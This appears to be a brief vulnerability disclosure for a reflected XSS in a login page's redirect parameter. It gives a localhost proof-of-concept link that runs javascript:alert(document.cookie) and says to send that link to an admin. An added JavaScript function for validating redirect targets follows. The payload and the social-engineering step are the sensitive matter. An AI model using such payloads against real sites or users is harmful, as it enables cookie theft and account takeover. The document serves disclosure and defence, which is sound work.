The login endpoint allows a JavaScript payload in the redirect parameter to execute, which leads to an XSS pop-up.
Send this link to the admin: http://127.0.0.1:2222/login/?redirect=javascript:alert(document.cookie)
When he opens it and tries to log in, the XSS pop-up will appear.
https://drive.google.com/file/d/1VoO0BHUE03o0iOo8B9WFRvC1zRrFN4-T/view?usp=sharing
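
One way to validate the redirect value before navigating after login, as an added example that is not the project's own code. The function name, the fallback path and the ORIGIN constant are assumptions; the sample inputs are constructed.

```javascript
// Added example: accept only same-origin, path-absolute redirect targets.
// ORIGIN and FALLBACK are assumptions for this sketch.
const ORIGIN = "http://127.0.0.1:2222";
const FALLBACK = "/";

function safeRedirectTarget(raw, origin = ORIGIN) {
  if (typeof raw !== "string" || raw.length === 0) return FALLBACK;

  // Browsers strip tabs/newlines inside URLs and treat "\" like "/",
  // so reject control characters and backslashes before any parsing.
  if (/[\u0000-\u001f\u007f\\]/.test(raw)) return FALLBACK;

  // Only path-absolute references ("/x") are allowed. This rejects
  // scheme-bearing values such as "javascript:..." and
  // protocol-relative values such as "//host/x".
  if (!raw.startsWith("/") || raw.startsWith("//")) return FALLBACK;

  let url;
  try {
    url = new URL(raw, origin);
  } catch {
    return FALLBACK;
  }

  // Defence in depth: the resolved URL must stay on our origin and on http(s).
  if (url.origin !== new URL(origin).origin) return FALLBACK;
  if (url.protocol !== "http:" && url.protocol !== "https:") return FALLBACK;

  // Return a normalised relative target, never an absolute URL.
  return url.pathname + url.search + url.hash;
}

// Constructed sample inputs, including the value from the report.
const samples = [
  "javascript:alert(document.cookie)",
  "/dashboard?tab=1",
  "//other.example/x",
  "/\\other.example",
];
for (const s of samples) {
  console.log(JSON.stringify(s), "->", safeRedirectTarget(s));
}
```

Apply the same check on the server if the redirect is issued there, so the value is never trusted on either side.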